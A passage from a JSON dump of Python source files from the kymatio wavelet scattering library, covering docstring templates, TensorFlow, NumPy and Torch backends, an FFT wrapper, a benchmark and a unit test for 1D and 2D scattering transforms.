the\n number of signals to transform (the batch size) and `T` is the length\n of the signal, we compute its scattering transform by passing it to\n the `scattering` method (or calling the alias `{alias_name}`). Note\n that `B` can be one, in which case it may be omitted, giving an input\n of shape `(T,)`.\n\n Example\n -------\n ::\n\n # Set the parameters of the scattering transform.\n J = 6\n T = 2 ** 13\n Q = 8\n\n # Generate a sample signal.\n x = {sample}\n\n # Define a Scattering1D object.\n {instantiation}\n\n # Calculate the scattering transform.\n Sx = S.scattering(x)\n\n # Equivalently, use the alias.\n Sx = S{alias_call}(x)\n\n Above, the length of the signal is :math:`T = 2^{{13}} = 8192`, while the\n maximum scale of the scattering transform is set to :math:`2^J = 2^6 =\n 64`. The time-frequency resolution of the first-order wavelets\n :math:`\\psi_\\lambda^{{(1)}}(t)` is set to `Q = 8` wavelets per octave.\n The second-order wavelets :math:`\\psi_\\mu^{{(2)}}(t)` always have one\n wavelet per octave.\n\n Parameters\n ----------\n J : int\n The maximum log-scale of the scattering transform. In other words,\n the maximum scale is given by :math:`2^J`.\n {param_shape}Q : int >= 1\n The number of first-order wavelets per octave (second-order\n wavelets are fixed to one wavelet per octave). Defaults to `1`.\n max_order : int, optional\n The maximum order of scattering coefficients to compute. Must be\n either `1` or `2`. Defaults to `2`.\n {param_average}oversampling : integer >= 0, optional\n Controls the oversampling factor relative to the default as a\n power of two. Since the convolving by wavelets (or lowpass\n filters) and taking the modulus reduces the high-frequency content\n of the signal, we can subsample to save space and improve\n performance. However, this may reduce precision in the\n calculation. If this is not desirable, `oversampling` can be set\n to a large value to prevent too much subsampling. This parameter\n may be modified after object creation. Defaults to `0`.\n {param_vectorize}\n Attributes\n ----------\n J : int\n The maximum log-scale of the scattering transform. In other words,\n the maximum scale is given by `2 ** J`.\n {param_shape}Q : int\n The number of first-order wavelets per octave (second-order\n wavelets are fixed to one wavelet per octave).\n {attrs_shape}max_order : int\n The maximum scattering order of the transform.\n {attr_average}oversampling : int\n The number of powers of two to oversample the output compared to\n the default subsampling rate determined from the filters.\n {attr_vectorize}\"\"\"\n\n _doc_scattering = \\\n \"\"\"Apply the scattering transform\n\n Given an input `{array}` of size `(B, T)`, where `B` is the batch\n size (it can be potentially an integer or a shape) and `T` is the length\n of the individual signals, this function computes its scattering\n transform. If the `vectorize` flag is set to `True` (or if it is not\n available in this frontend), the output is in the form of a `{array}`\n or size `(B, C, T1)`, where `T1` is the signal length after subsampling\n to the scale :math:`2^J` (with the appropriate oversampling factor to\n reduce aliasing), and `C` is the number of scattering coefficients. If\n `vectorize` is set `False`, however, the output is a dictionary\n containing `C` keys, each a tuple whose length corresponds to the\n scattering order and whose elements are the sequence of filter indices\n used.\n\n Note that the `vectorize` flag has been deprecated in favor of the\n `out_type` parameter. If this is set to `'array'` (the default), the\n `vectorize` flag is still respected, but if not, `out_type` takes\n precedence. The two current output types are `'array'` and `'list'`.\n The former gives the type of output described above. If set to\n `'list'`, however, the output is a list of dictionaries, each\n dictionary corresponding to a scattering coefficient and its associated\n meta information. The coefficient is stored under the `'coef'` key,\n while other keys contain additional information, such as `'j'` (the\n scale of the filter used) and `'n`' (the filter index).\n\n Furthermore, if the `average` flag is set to `False`, these outputs\n are not averaged, but are simply the wavelet modulus coefficients of\n the filters.\n\n Parameters\n ----------\n x : {array}\n An input `{array}` of size `(B, T)`.\n\n Returns\n -------\n S : tensor or dictionary\n If `out_type` is `'array'` and the `vectorize` flag is `True`, the\n output is a{n} `{array}` containing the scattering coefficients,\n while if `vectorize` is `False`, it is a dictionary indexed by\n tuples of filter indices. If `out_type` is `'list'`, the output is\n a list of dictionaries as described above.\n \"\"\"\n\n @classmethod\n def _document(cls):\n instantiation = cls._doc_instantiation_shape[cls._doc_has_shape]\n param_shape = cls._doc_param_shape if cls._doc_has_shape else ''\n attrs_shape = cls._doc_attrs_shape if cls._doc_has_shape else ''\n\n param_average = cls._doc_param_average if cls._doc_has_out_type else ''\n attr_average = cls._doc_attr_average if cls._doc_has_out_type else ''\n param_vectorize = cls._doc_param_vectorize if cls._doc_has_out_type else ''\n attr_vectorize = cls._doc_attr_vectorize if cls._doc_has_out_type else ''\n\n cls.__doc__ = ScatteringBase1D._doc_class.format(\n array=cls._doc_array,\n frontend_paragraph=cls._doc_frontend_paragraph,\n alias_name=cls._doc_alias_name,\n alias_call=cls._doc_alias_call,\n instantiation=instantiation,\n param_shape=param_shape,\n attrs_shape=attrs_shape,\n param_average=param_average,\n attr_average=attr_average,\n param_vectorize=param_vectorize,\n attr_vectorize=attr_vectorize,\n sample=cls._doc_sample.format(shape=cls._doc_shape))\n\n cls.scattering.__doc__ = ScatteringBase1D._doc_scattering.format(\n array=cls._doc_array,\n n=cls._doc_array_n)\n\n\n__all__ = ['ScatteringBase1D']\n"
},
{
"alpha_fraction": 0.7670196890830994,
"alphanum_fraction": 0.7987897396087646,
"avg_line_length": 43.06666564941406,
"blob_id": "d18ccaa2dc30b1e9e9b564d0a03b64124dbdc03f",
"content_id": "042c8d7c5cde95b5c25712799c45d1782cfa254d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 661,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 15,
"path": "/kymatio/tensorflow.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.tensorflow_frontend import ScatteringTensorFlow1D as Scattering1D\nfrom .scattering2d.frontend.tensorflow_frontend import ScatteringTensorFlow2D as Scattering2D\nfrom .scattering3d.frontend.tensorflow_frontend \\\n import HarmonicScatteringTensorFlow3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.tensorflow'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.tensorflow'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.tensorflow'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
},
{
"alpha_fraction": 0.49059829115867615,
"alphanum_fraction": 0.5002849102020264,
"avg_line_length": 30.303571701049805,
"blob_id": "b2c261e1387cad586c2c92a5bc83286b7754bd4c",
"content_id": "bee350adc3e88c4a81d8c6ace2e4f4b6a1f119a8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1755,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 56,
"path": "/kymatio/backend/base_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "\n\nclass FFT:\n def __init__(self, fft, ifft, irfft, type_checks):\n self.fft = fft\n self.ifft = ifft\n self.irfft = irfft\n self.sanity_checks = type_checks\n\n def fft_forward(self, x, direction='C2C', inverse=False):\n \"\"\"Interface with FFT routines for any dimensional signals and any backend signals.\n\n Example (for Torch)\n -------\n x = torch.randn(128, 32, 32, 2)\n x_fft = fft(x)\n x_ifft = fft(x, inverse=True)\n\n Parameters\n ----------\n x : input\n Complex input for the FFT.\n direction : string\n 'C2R' for complex to real, 'C2C' for complex to complex.\n inverse : bool\n True for computing the inverse FFT.\n NB : If direction is equal to 'C2R', then an error is raised.\n\n Raises\n ------\n RuntimeError\n In the event that we are going from complex to real and not doing\n the inverse FFT or in the event x is not contiguous.\n\n\n Returns\n -------\n output :\n Result of FFT or IFFT.\n \"\"\"\n if direction == 'C2R':\n if not inverse:\n raise RuntimeError('C2R mode can only be done with an inverse FFT.')\n\n self.sanity_checks(x)\n\n if direction == 'C2R':\n output = self.irfft(x)\n elif direction == 'C2C':\n if inverse:\n output = self.ifft(x)\n else:\n output = self.fft(x)\n\n return output\n\n def __call__(self, x, direction='C2C', inverse=False):\n return self.fft_forward(x, direction=direction, inverse=inverse)\n"
},
{
"alpha_fraction": 0.6214421391487122,
"alphanum_fraction": 0.6306926012039185,
"avg_line_length": 31.430768966674805,
"blob_id": "c834a37c86b13cb0fc0c76c6341e7c4176e49888",
"content_id": "97e8366eb995ba5691eb20d8912b6bc9b0801d4e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4216,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 130,
"path": "/kymatio/scattering1d/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Joakim Anden, Mathieu Andreux\nimport tensorflow as tf\nfrom collections import namedtuple\n\n\nBACKEND_NAME = 'tensorflow'\n\n\nfrom ...backend.tensorflow_backend import Modulus, real, concatenate, cdgmm\nfrom ...backend.base_backend import FFT\n\ndef subsample_fourier(x, k):\n \"\"\"Subsampling in the Fourier domain\n Subsampling in the temporal domain amounts to periodization in the Fourier\n domain, so the input is periodized according to the subsampling factor.\n Parameters\n ----------\n x : tensor\n Input tensor with at least 3 dimensions, where the next to last\n corresponds to the frequency index in the standard PyTorch FFT\n ordering. The length of this dimension should be a power of 2 to\n avoid errors. The last dimension should represent the real and\n imaginary parts of the Fourier transform.\n k : int\n The subsampling factor.\n Returns\n -------\n res : tensor\n The input tensor periodized along the next to last axis to yield a\n tensor of size x.shape[-2] // k along that dimension.\n \"\"\"\n\n N = x.shape[-1]\n y = tf.reshape(x, (-1, k, N // k))\n\n return tf.reduce_mean(y, axis=(1,))\n\n\ndef pad_1d(x, pad_left, pad_right, mode='constant', value=0.):\n \"\"\"Pad real 1D tensors\n 1D implementation of the padding function for real PyTorch tensors.\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n mode : string, optional\n Padding mode. Options include 'constant' and 'reflect'. See the\n PyTorch API for other options. Defaults to 'constant'.\n value : float, optional\n If mode == 'constant', value to input within the padding. Defaults to\n 0.\n Returns\n -------\n res : tensor\n The tensor passed along the third dimension.\n \"\"\"\n if (pad_left >= x.shape[-1]) or (pad_right >= x.shape[-1]):\n if mode == 'reflect':\n raise ValueError('Indefinite padding size (larger than tensor).')\n\n paddings = [[0, 0]] * len(x.shape[:-1])\n paddings += [[pad_left, pad_right],]\n return tf.cast(tf.pad(x, paddings, mode=\"REFLECT\"), tf.complex64)\n\n\ndef pad(x, pad_left=0, pad_right=0):\n \"\"\"Pad real 1D tensors and map to complex\n Padding which allows to simultaneously pad in a reflection fashion and map\n to complex if necessary.\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n Returns\n -------\n output : tensor\n A padded signal\n \"\"\"\n output = pad_1d(x, pad_left, pad_right, mode='reflect')\n return output\n\n\ndef unpad(x, i0, i1):\n \"\"\"Unpad real 1D tensor\n Slices the input tensor at indices between i0 and i1 along the last axis.\n Parameters\n ----------\n x : tensor\n Input tensor with least one axis.\n i0 : int\n Start of original signal before padding.\n i1 : int\n End of original signal before padding.\n Returns\n -------\n x_unpadded : tensor\n The tensor x[..., i0:i1].\n \"\"\"\n return x[..., i0:i1]\n\n\n\nbackend = namedtuple('backend', ['name', 'modulus_complex', 'subsample_fourier', 'real', 'unpad', 'fft', 'concatenate'])\nbackend.name = 'tensorflow'\nbackend.modulus_complex = Modulus()\nbackend.subsample_fourier = subsample_fourier\nbackend.real = real\nbackend.unpad = unpad\nbackend.cdgmm = cdgmm\nbackend.pad = pad\nbackend.pad_1d = pad_1d\nbackend.fft = FFT(lambda x: tf.signal.fft(x, name='fft1d'),\n lambda x: tf.signal.ifft(x, name='ifft1d'),\n lambda x: tf.math.real(tf.signal.ifft(x, name='irfft1d')),\n lambda x: None)\nbackend.concatenate = lambda x: concatenate(x, -2)\n"
},
{
"alpha_fraction": 0.5126323103904724,
"alphanum_fraction": 0.522704005241394,
"avg_line_length": 38.31543731689453,
"blob_id": "008a75a668071ba5e187710ab30c5b0955befb0a",
"content_id": "d2450272c009aeed70b9316795a3a059ae29ba5b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5858,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 149,
"path": "/kymatio/scattering1d/frontend/torch_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Mathieu Andreux, Joakim Anden, Edouard Oyallon\n# Scientific Ancestry: Joakim Anden, Mathieu Andreux, Vincent Lostanlen\n\nimport torch\nimport warnings\n\nfrom ...frontend.torch_frontend import ScatteringTorch\nfrom ..core.scattering1d import scattering1d\nfrom ..utils import precompute_size_scattering\nfrom .base_frontend import ScatteringBase1D\n\n\nclass ScatteringTorch1D(ScatteringTorch, ScatteringBase1D):\n def __init__(self, J, shape, Q=1, max_order=2, average=True,\n oversampling=0, vectorize=True, out_type='array', backend='torch'):\n ScatteringTorch.__init__(self)\n ScatteringBase1D.__init__(self, J, shape, Q, max_order, average,\n oversampling, vectorize, out_type, backend)\n ScatteringBase1D._instantiate_backend(self, 'kymatio.scattering1d.backend.')\n ScatteringBase1D.build(self)\n ScatteringBase1D.create_filters(self)\n self.register_filters()\n\n def register_filters(self):\n \"\"\" This function run the filterbank function that\n will create the filters as numpy array, and then, it\n saves those arrays as module's buffers.\"\"\"\n n = 0\n # prepare for pytorch\n for k in self.phi_f.keys():\n if type(k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n self.phi_f[k] = torch.from_numpy(\n self.phi_f[k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), self.phi_f[k])\n n += 1\n for psi_f in self.psi1_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1\n for psi_f in self.psi2_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n # view(-1, 1).repeat(1, 2) because real numbers!\n psi_f[sub_k] = torch.from_numpy(\n psi_f[sub_k]).float().view(-1, 1)\n self.register_buffer('tensor' + str(n), psi_f[sub_k])\n n += 1\n\n def load_filters(self):\n \"\"\"This function loads filters from the module's buffer \"\"\"\n buffer_dict = dict(self.named_buffers())\n n = 0\n\n for k in self.phi_f.keys():\n if type(k) != str:\n self.phi_f[k] = buffer_dict['tensor' + str(n)]\n n += 1\n\n for psi_f in self.psi1_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n psi_f[sub_k] = buffer_dict['tensor' + str(n)]\n n += 1\n\n for psi_f in self.psi2_f:\n for sub_k in psi_f.keys():\n if type(sub_k) != str:\n psi_f[sub_k] = buffer_dict['tensor' + str(n)]\n n += 1\n\n def scattering(self, x):\n # basic checking, should be improved\n if len(x.shape) < 1:\n raise ValueError(\n 'Input tensor x should have at least one axis, got {}'.format(\n len(x.shape)))\n\n if not self.out_type in ('array', 'list'):\n raise RuntimeError(\"The out_type must be one of 'array' or 'list'.\")\n\n if not self.average and self.out_type == 'array' and self.vectorize:\n raise ValueError(\"Options average=False, out_type='array' and \"\n \"vectorize=True are mutually incompatible. \"\n \"Please set out_type to 'list' or vectorize to \"\n \"False.\")\n\n if not self.vectorize:\n warnings.warn(\"The vectorize option is deprecated and will be \"\n \"removed in version 0.3. Please set \"\n \"out_type='list' for equivalent functionality.\",\n DeprecationWarning)\n\n batch_shape = x.shape[:-1]\n signal_shape = x.shape[-1:]\n\n x = x.reshape((-1, 1) + signal_shape)\n\n self.load_filters()\n\n # get the arguments before calling the scattering\n # treat the arguments\n if self.vectorize:\n size_scattering = precompute_size_scattering(\n self.J, self.Q, max_order=self.max_order, detail=True)\n else:\n size_scattering = 0\n\n\n S = scattering1d(x, self.backend.pad, self.backend.unpad, self.backend, self.J, self.psi1_f, self.psi2_f, self.phi_f,\\\n max_order=self.max_order, average=self.average,\n pad_left=self.pad_left, pad_right=self.pad_right,\n ind_start=self.ind_start, ind_end=self.ind_end,\n oversampling=self.oversampling,\n vectorize=self.vectorize,\n size_scattering=size_scattering,\n out_type=self.out_type)\n\n if self.out_type == 'array' and self.vectorize:\n scattering_shape = S.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S = S.reshape(new_shape)\n elif self.out_type == 'array' and not self.vectorize:\n for k, v in S.items():\n # NOTE: Have to get the shape for each one since we may have\n # average == False.\n scattering_shape = v.shape[-2:]\n new_shape = batch_shape + scattering_shape\n\n S[k] = v.reshape(new_shape)\n elif self.out_type == 'list':\n for x in S:\n scattering_shape = x['coef'].shape[-1:]\n new_shape = batch_shape + scattering_shape\n\n x['coef'] = x['coef'].reshape(new_shape)\n\n return S\n\n\nScatteringTorch1D._document()\n\n\n__all__ = ['ScatteringTorch1D']\n"
},
{
"alpha_fraction": 0.5499621629714966,
"alphanum_fraction": 0.565102219581604,
"avg_line_length": 29.720930099487305,
"blob_id": "9cf4605d7abbef18e769cc5c2aa9c88c9fd7ea09",
"content_id": "25b0017623d7c1f7ac29b016473e857de544fe85",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2642,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 86,
"path": "/kymatio/scattering2d/backend/tensorflow_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Sergey Zagoruyko, Muawiz Chaudhary\n\nimport tensorflow as tf\nfrom collections import namedtuple\n\nBACKEND_NAME = 'tensorflow'\n\n\nfrom ...backend.tensorflow_backend import Modulus, cdgmm, concatenate\nfrom ...backend.base_backend import FFT\n\nclass Pad(object):\n def __init__(self, pad_size, input_size):\n \"\"\"\n Padding which allows to simultaneously pad in a reflection fashion\n and map to complex.\n Parameters\n ----------\n pad_size : list of 4 integers\n size of padding to apply.\n input_size : list of 2 integers\n size of the original signal\n \"\"\"\n self.pad_size = pad_size\n\n def __call__(self, x):\n paddings = [[0, 0]] * len(x.shape[:-2])\n paddings += [[self.pad_size[0], self.pad_size[1]], [self.pad_size[2], self.pad_size[3]]]\n return tf.cast(tf.pad(x, paddings, mode=\"REFLECT\"), tf.complex64)\n\ndef unpad(in_):\n \"\"\"\n Slices the input tensor at indices between 1::-1\n Parameters\n ----------\n in_ : tensor_like\n input tensor\n Returns\n -------\n in_[..., 1:-1, 1:-1]\n \"\"\"\n return in_[..., 1:-1, 1:-1]\n\n\nclass SubsampleFourier(object):\n \"\"\" Subsampling of a 2D image performed in the Fourier domain.\n\n Subsampling in the spatial domain amounts to periodization\n in the Fourier domain, hence the formula.\n\n Parameters\n ----------\n x : tensor_like\n input tensor with at least three dimensions.\n k : int\n integer such that x is subsampled by k along the spatial variables.\n\n Returns\n -------\n out : tensor_like\n Tensor such that its Fourier transform is the Fourier\n transform of a subsampled version of x, i.e. in\n F^{-1}(out)[u1, u2] = F^{-1}(x)[u1 * k, u2 * k]\n\n \"\"\"\n def __call__(self, x, k):\n y = tf.reshape(x, (-1, k, x.shape[1] // k, k, x.shape[2] // k))\n\n out = tf.reduce_mean(y, axis=(1, 3))\n return out\n\n\n\nbackend = namedtuple('backend', ['name', 'cdgmm', 'modulus', 'subsample_fourier', 'fft', 'Pad', 'unpad', 'concatenate'])\n\nbackend.name = 'tensorflow'\nbackend.cdgmm = cdgmm\nbackend.modulus = Modulus()\nbackend.subsample_fourier = SubsampleFourier()\nbackend.fft = FFT(lambda x: tf.signal.fft2d(x, name='fft2d'),\n lambda x: tf.signal.ifft2d(x, name='ifft2d'),\n lambda x: tf.math.real(tf.signal.ifft2d(x, name='irfft2d')),\n lambda x: None)\nbackend.Pad = Pad\nbackend.unpad = unpad\nbackend.concatenate = lambda x: concatenate(x, -3)\n"
},
{
"alpha_fraction": 0.5425242781639099,
"alphanum_fraction": 0.55611652135849,
"avg_line_length": 25.275510787963867,
"blob_id": "656018c43421131e96e65c0ec8757e1f29cb3b1a",
"content_id": "de8ae717bc18eaaaec4d79a6efb4b9e6351f1c8e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2575,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 98,
"path": "/kymatio/scattering2d/backend/numpy_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Sergey Zagoruyko, Muawiz Chaudhary\n\nimport numpy as np\nfrom collections import namedtuple\n\nBACKEND_NAME = 'numpy'\n\n\nfrom ...backend.numpy_backend import modulus, cdgmm\nfrom ...backend.base_backend import FFT\n\n\nclass Pad(object):\n def __init__(self, pad_size, input_size):\n \"\"\"\n Padding which allows to simultaneously pad in a reflection fashion\n and map to complex.\n\n Parameters\n ----------\n pad_size : list of 4 integers\n size of padding to apply.\n input_size : list of 2 integers\n size of the original signal\n\n \"\"\"\n self.pad_size = pad_size\n\n def __call__(self, x):\n paddings = ((0, 0),) * (x.ndim - 2)\n paddings += ((self.pad_size[0], self.pad_size[1]), (self.pad_size[2], self.pad_size[3]))\n\n output = np.pad(x, paddings, mode='reflect')\n return output\n\n\ndef unpad(in_):\n \"\"\"\n Slices the input tensor at indices between 1::-1\n\n Parameters\n ----------\n in_ : tensor_like\n input tensor\n\n Returns\n -------\n in_[..., 1:-1, 1:-1]\n\n \"\"\"\n return in_[..., 1:-1, 1:-1]\n\n\nclass SubsampleFourier(object):\n \"\"\" Subsampling of a 2D image performed in the Fourier domain.\n\n Subsampling in the spatial domain amounts to periodization\n in the Fourier domain, hence the formula.\n\n Parameters\n ----------\n x : tensor_like\n input tensor with at least three dimensions.\n k : int\n integer such that x is subsampled by k along the spatial variables.\n\n Returns\n -------\n out : tensor_like\n Tensor such that its Fourier transform is the Fourier\n transform of a subsampled version of x, i.e. in\n F^{-1}(out)[u1, u2] = F^{-1}(x)[u1 * k, u2 * k]\n\n \"\"\"\n def __call__(self, x, k):\n y = x.reshape(-1, k, x.shape[1] // k, k, x.shape[2] // k)\n\n out = y.mean(axis=(1, 3))\n\n return out\n\n\ndef concatenate(arrays):\n return np.stack(arrays, axis=-3)\n\n\nbackend = namedtuple('backend', ['name', 'cdgmm', 'modulus', 'subsample_fourier', 'fft', 'Pad', 'unpad', 'concatenate'])\nbackend.name = 'numpy'\nbackend.cdgmm = cdgmm\nbackend.modulus = modulus\nbackend.subsample_fourier = SubsampleFourier()\nbackend.fft = FFT(lambda x:np.fft.fft2(x),\n lambda x:np.fft.ifft2(x),\n lambda x:np.real(np.fft.ifft2(x)),\n lambda x:None)\nbackend.Pad = Pad\nbackend.unpad = unpad\nbackend.concatenate = concatenate\n"
},
{
"alpha_fraction": 0.4234234094619751,
"alphanum_fraction": 0.4579579532146454,
"avg_line_length": 25.639999389648438,
"blob_id": "01ec773158ca1b4715828e018f6990880a8bc7e0",
"content_id": "93afc07c371042fba6b997eb8dce138c80b83bb2",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1334,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 50,
"path": "/benchmarks/benchmarks/scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import torch\nimport kymatio.scattering1d.backend as backend\nfrom kymatio import Scattering1D\n\nclass BenchmarkScattering1D:\n params = [\n [\n { # Typical of EEG. J=8, Q=1, N=1024\n # See Warrick et al. Physiological Measurement 2019\n \"J\": 8,\n \"Q\": 1,\n \"shape\": 1024,\n },\n { # Typical of speech.\n # See Andén and Mallat TASLP 2014\n \"J\": 8,\n \"Q\": 8,\n \"shape\": 4096,\n },\n { # Typical of music.\n # See Andén et al.\n \"J\": 16,\n \"Q\": 12,\n \"shape\": 131072,\n },\n ],\n [\n 32,\n ]\n ]\n param_names = [\"sc_params\", \"batch_size\"]\n\n def setup(self, sc_params, batch_size):\n n_channels = 1\n scattering = Scattering1D(**sc_params)\n scattering.cpu()\n x = torch.randn(\n batch_size,\n n_channels,\n sc_params[\"shape\"],\n dtype=torch.float32)\n x.cpu()\n self.scattering = scattering\n self.x = x\n\n def time_constructor(self, sc_params, batch_size):\n Scattering1D(**sc_params)\n\n def time_forward(self, sc_params, batch_size):\n (self.scattering).forward(self.x)\n"
},
{
"alpha_fraction": 0.6047516465187073,
"alphanum_fraction": 0.6144708395004272,
"avg_line_length": 25.457143783569336,
"blob_id": "d3b626a64c373582a352b244183b3c25cf538059",
"content_id": "bd4a096eac7945555c93e328686d0b02c42d7dfd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 926,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 35,
"path": "/tests/scattering1d/test_numpy_scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom kymatio import Scattering1D\nimport os\nimport numpy as np\nimport io\n\nbackends = []\n\nfrom kymatio.scattering1d.backend.numpy_backend import backend\nbackends.append(backend)\n\nclass TestScattering1DNumpy:\n @pytest.mark.parametrize('backend', backends)\n def test_Scattering1D(self, backend):\n \"\"\"\n Applies scattering on a stored signal to make sure its output agrees with\n a previously calculated version.\n \"\"\"\n test_data_dir = os.path.dirname(__file__)\n\n with open(os.path.join(test_data_dir, 'test_data_1d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n x = data['x']\n J = data['J']\n Q = data['Q']\n Sx0 = data['Sx']\n\n T = x.shape[-1]\n\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='numpy')\n\n Sx = scattering(x)\n assert np.allclose(Sx, Sx0)\n"
},
{
"alpha_fraction": 0.6044018268585205,
"alphanum_fraction": 0.6044018268585205,
"avg_line_length": 43.29999923706055,
"blob_id": "6a13c54aaab34648b683c8ca857fd50a6747f241",
"content_id": "867c22f78d6910897a32400b723ad212bb97ea69",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1772,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 40,
"path": "/kymatio/frontend/base_frontend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import importlib\n\n\nclass ScatteringBase():\n def __init__(self):\n super(ScatteringBase, self).__init__()\n\n def build(self):\n \"\"\" Defines elementary routines.\n\n This function should always call and create the filters via\n self.create_filters() defined below. For instance, via:\n self.filters = self.create_filters() \"\"\"\n raise NotImplementedError\n\n def _instantiate_backend(self, import_string):\n \"\"\" This function should instantiate the backend to be used if not already\n specified\"\"\"\n\n # Either the user entered a string, in which case we load the corresponding backend.\n if isinstance(self.backend, str):\n if self.backend.startswith(self.frontend_name):\n try:\n self.backend = importlib.import_module(import_string + self.backend + \"_backend\", 'backend').backend\n except ImportError:\n raise ImportError('Backend ' + self.backend + ' not found!')\n else:\n raise ImportError('The backend ' + self.backend + ' can not be called from the frontend ' +\n self.frontend_name + '.')\n # Either the user passed a backend object, in which case we perform a compatibility check.\n else:\n if not self.backend.name.startswith(self.frontend_name):\n raise ImportError('The backend ' + self.backend.name + ' is not supported by the frontend ' +\n self.frontend_name + '.')\n\n def create_filters(self):\n \"\"\" This function should run a filterbank function that\n will create the filters as numpy array, and then, it should\n save those arrays. \"\"\"\n raise NotImplementedError\n"
},
{
"alpha_fraction": 0.40248963236808777,
"alphanum_fraction": 0.44605809450149536,
"avg_line_length": 26.078651428222656,
"blob_id": "4f3ce28c2347d2e80d674f9e906b700d5cbb7844",
"content_id": "62903626d6c294d6102b83ddd23800759ac1eeb9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2410,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 89,
"path": "/kymatio/scattering2d/core/scattering2d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Muawiz Chaudhary\n# Scientific Ancestry: Edouard Oyallon, Laurent Sifre, Joan Bruna\n\ndef scattering2d(x, pad, unpad, backend, J, L, phi, psi, max_order,\n out_type='array'):\n subsample_fourier = backend.subsample_fourier\n modulus = backend.modulus\n fft = backend.fft\n cdgmm = backend.cdgmm\n concatenate = backend.concatenate\n\n # Define lists for output.\n out_S_0, out_S_1, out_S_2 = [], [], []\n\n U_r = pad(x)\n\n U_0_c = fft(U_r, 'C2C')\n\n # First low pass filter\n U_1_c = cdgmm(U_0_c, phi[0])\n U_1_c = subsample_fourier(U_1_c, k=2 ** J)\n\n S_0 = fft(U_1_c, 'C2R', inverse=True)\n S_0 = unpad(S_0)\n\n out_S_0.append({'coef': S_0,\n 'j': (),\n 'theta': ()})\n\n for n1 in range(len(psi)):\n j1 = psi[n1]['j']\n theta1 = psi[n1]['theta']\n\n U_1_c = cdgmm(U_0_c, psi[n1][0])\n if j1 > 0:\n U_1_c = subsample_fourier(U_1_c, k=2 ** j1)\n U_1_c = fft(U_1_c, 'C2C', inverse=True)\n U_1_c = modulus(U_1_c)\n U_1_c = fft(U_1_c, 'C2C')\n\n # Second low pass filter\n S_1_c = cdgmm(U_1_c, phi[j1])\n S_1_c = subsample_fourier(S_1_c, k=2 ** (J - j1))\n\n S_1_r = fft(S_1_c, 'C2R', inverse=True)\n S_1_r = unpad(S_1_r)\n\n out_S_1.append({'coef': S_1_r,\n 'j': (j1,),\n 'theta': (theta1,)})\n\n if max_order < 2:\n continue\n for n2 in range(len(psi)):\n j2 